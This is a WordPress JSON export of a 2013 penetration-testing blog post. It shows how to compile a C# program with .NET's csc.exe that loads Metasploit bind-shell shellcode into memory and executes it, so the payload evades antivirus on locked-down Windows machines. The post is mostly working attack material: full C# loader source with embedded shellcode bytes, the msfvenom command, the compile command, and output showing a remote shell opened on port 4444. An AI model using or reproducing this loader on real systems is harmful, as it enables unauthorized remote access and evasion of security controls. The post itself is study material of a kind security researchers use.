{"id":911,"date":"2013-01-25T13:29:41","date_gmt":"2013-01-25T13:29:41","guid":{"rendered":"https:\/\/www.phillips321.co.uk:443\/?p=911"},"modified":"2013-02-13T17:04:07","modified_gmt":"2013-02-13T17:04:07","slug":"use-net-csc-exe-to-create-a-malicious-dllexe-on-locked-down-systems","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2013\/01\/25\/use-net-csc-exe-to-create-a-malicious-dllexe-on-locked-down-systems\/","title":{"rendered":"Use .NET csc.exe to create a malicious EXE on locked down systems"},"content":{"rendered":"

First off, credit for this work goes to n3k @kiqueNissim<\/a> and X_Typhon @lintuxt<\/a> who produced an excellent paper here<\/a>.<\/p>\n

These notes are not to take anything away from the two mentioned above but are purely for my own reference (I find writing things up helps me to remember it), I strongly suggest reading the white paper as it goes into much more detail than I will here.<\/p>\n

So on a locked-down system you might find yourself with no ability to import malicious code, or for that matter execute it due to Anti-Vitus protection. So what about just writing the code up in notepad and then compiling it using csc.exe. Note: csc.exe comes packaged with each of the .NET framework versions.
\n\"csc\"<\/a>
\nWe can use this to our advantage as we can create C# code that contains our optcode. As the optocde is stored as text but read directly into memory it never touches disk as assembly so doesn’t get picked up by AV. The C# code then allows the code to be executable and calls it directly.<\/p>\n

The same code below is taken from the white paper but I have replaced the shellcode with a simple bind_tcp.<\/p>\n

\n\n
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<\/div><\/td>
using<\/span> System<\/span>;<\/span>
\nusing<\/span> System.Reflection<\/span>;<\/span>
\nusing<\/span> System.Runtime.InteropServices<\/span>;<\/span>
\nnamespace<\/span> ExecASMHardcoded
\n{<\/span>
\n        class<\/span> Program
\n        {<\/span>
\n                [<\/span>DllImport(<\/span>"kernel32.dll"<\/span>, SetLastError =<\/span> true<\/span>)<\/span>]<\/span>
\n                static<\/span> extern<\/span> bool<\/span> VirtualProtect(<\/span>IntPtr lpAddress, uint<\/span> dwSize, uint<\/span> flNewProtect, out<\/span> uint<\/span> lpflOldProtect)<\/span>;<\/span>
\n                public<\/span> delegate<\/span> uint<\/span> Ret1ArgDelegate(<\/span>uint<\/span> address)<\/span>;<\/span>
\n                static<\/span> uint<\/span> PlaceHolder1(<\/span>uint<\/span> arg1)<\/span> {<\/span> return<\/span> 0<\/span>;<\/span> }<\/span>
\n                public<\/span> static<\/span> byte<\/span>[<\/span>]<\/span> asmBytes =<\/span> new<\/span><\/a> byte<\/span>[<\/span>]<\/span>
\n                {<\/span>
\n                        \/\/msfvenom -p windows\/shell_bind_tcp -e none | sed -e \u2018s\/"\/\/ig\u2019 | sed -e \u2018s\/+\/\/ig\u2019 | sed -e \u2018s\/\\\\x\/,0x\/ig\u2019<\/span>
\n                        0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,
\n                        0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
\n                        0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
\n                        0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
\n                        0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,
\n                        0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,
\n                        0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,
\n                        0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
\n                        0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
\n                        0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,
\n                        0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,
\n                        0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,
\n                        0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
\n                        0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31,
\n                        0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,
\n                        0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,
\n                        0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7,
\n                        0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,
\n                        0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,
\n                        0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,
\n                        0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,
\n                        0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,
\n                        0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
\n                        0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
\n                        0x6a,0x00,0x53,0xff,0xd5,
\n                }<\/span>;<\/span>
\n                unsafe<\/span> static<\/span> void<\/span> Main(<\/span>string<\/span>[<\/span>]<\/span> args)<\/span>
\n                {<\/span>
\n                        fixed<\/span> (<\/span>byte<\/span>*<\/span> startAddress =<\/span> &<\/span>asmBytes[<\/span>0<\/span>]<\/span>)<\/span> \/\/ Take the address of our x86 code<\/span>
\n                        {<\/span>
\n                                \/\/ Get the FieldInfo for "_methodPtr"<\/span>
\n                                Type delType =<\/span> typeof<\/span><\/a>(<\/span>Delegate<\/span>)<\/span>;<\/span>
\n                                FieldInfo _methodPtr =<\/span> delType.<\/span>GetField<\/span>(<\/span>"_methodPtr"<\/span>, BindingFlags.<\/span>NonPublic<\/span> |<\/span>
\n                                BindingFlags.<\/span>Instance<\/span>)<\/span>;<\/span>
\n                                \/\/ Set our delegate to our x86 code<\/span>
\n                                Ret1ArgDelegate del =<\/span> new<\/span><\/a> Ret1ArgDelegate(<\/span>PlaceHolder1)<\/span>;<\/span>
\n                                _methodPtr.<\/span>SetValue<\/span>(<\/span>del, (<\/span>IntPtr)<\/span> startAddress)<\/span>;<\/span>
\n                                \/\/Disable protection<\/span>
\n                                uint<\/span> outOldProtection;<\/span>
\n                                VirtualProtect(<\/span>(<\/span>IntPtr)<\/span> startAddress, (<\/span>uint<\/span>)<\/span> asmBytes.<\/span>Length<\/span>, 0x40, out<\/span> outOldProtection)<\/span>;<\/span>
\n                                \/\/ Enjoy<\/span>
\n                                uint<\/span> n =<\/span> (<\/span>uint<\/span>)<\/span>0x00000001;<\/span>
\n                                n =<\/span> del(<\/span>n)<\/span>;<\/span>
\n                                Console.<\/span>WriteLine<\/span>(<\/span>"{0:x}"<\/span>, n)<\/span>;<\/span>
\n                                Console.<\/span>ReadKey<\/span>(<\/span>)<\/span>;<\/span>
\n                        }<\/span>
\n                }<\/span>
\n        }<\/span>
\n}<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n\n<\/pre>\n
Next use the csc.exe to compile the code:<\/p>\n
1
2
3
4
<\/div><\/td>
C:\\Documents and Settings\\Administrator\\Desktop>C:\\WINDOWS\\Microsoft.NET\\Framewo
\nrk\\v4.0.30319\\csc.exe \/unsafe shell_bind.cs
\nMicrosoft (R) Visual C# 2010 Compiler version 4.0.30319.1
\nCopyright (C) Microsoft Corporation. All rights reserved.<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
This outputs shell_bind.exe, when this is run you then get a your bind shell:<\/p>\n
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<\/div><\/td>
C:\\Documents and Settings\\Administrator\\Desktop>netstat -anp tcp
\n
\nActive Connections
\n
\n  Proto  Local Address          Foreign Address        State
\n  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
\n  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
\n  TCP    127.0.0.1:1029         0.0.0.0:0              LISTENING
\n  TCP    127.0.0.1:4162         127.0.0.1:50505        SYN_SENT
\n  TCP    127.0.0.1:4242         0.0.0.0:0              LISTENING
\n  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING
\n  TCP    127.0.0.1:7337         0.0.0.0:0              LISTENING
\n  TCP    192.168.0.38:139       0.0.0.0:0              LISTENING
\n
\nC:\\Documents and Settings\\Administrator\\Desktop>ncat -vv 127.0.0.1 4444
\nNcat: Version 5.51 ( http:\/\/nmap.org\/ncat )
\nNcat: Connected to 127.0.0.1:4444.
\nMicrosoft Windows XP [Version 5.1.2600]
\n(C) Copyright 1985-2001 Microsoft Corp.
\n
\nC:\\Documents and Settings\\Administrator\\Desktop><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"
First off, credit for this work goes to n3k @kiqueNissim and X_Typhon @lintuxt who produced an excellent paper here. These notes are not to take anything away from the two mentioned above but are purely for my own reference (I find writing things up helps me to remember it), I strongly suggest reading the white […]<\/p>\n","protected":false},"author":1,"featured_media":924,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[345,344,346,114,347,349,348],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/911"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=911"}],"version-history":[{"count":20,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/911\/revisions"}],"predecessor-version":[{"id":986,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/911\/revisions\/986"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/924"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}